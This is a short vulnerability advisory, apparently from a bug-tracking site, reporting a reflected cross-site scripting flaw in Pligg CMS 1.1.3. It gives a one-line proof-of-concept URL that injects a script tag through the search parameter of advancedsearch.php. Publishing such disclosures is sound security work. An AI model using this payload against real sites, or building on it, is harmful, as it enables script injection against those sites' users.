Bug: Pligg CMS 1.1.3 Cross Site Scripting ( Ascii Version )

Search:
WLB2

Pligg CMS 1.1.3 Cross Site Scripting

Published
Credit
Risk
2011.02.03
AutoSec Tools
Low
CWE
CVE
Local
Remote
CWE-79
N/A ( Add )
No
Yes

------------------------------------------------------------------------
Software................Pligg CMS 1.1.3
Vulnerability...........Reflected Cross-site Scripting
Download................http://www.pligg.com
Release Date............1/30/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--Description--

A reflected cross-site scripting vulnerability in Pligg CMS 1.1.3 can
be exploited to execute arbitrary JavaScript.


--PoC--
http://localhost/pligg/advancedsearch.php?search=%3C/title%3E%3Cscript%3Ealert(0)%3C/script%3E

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version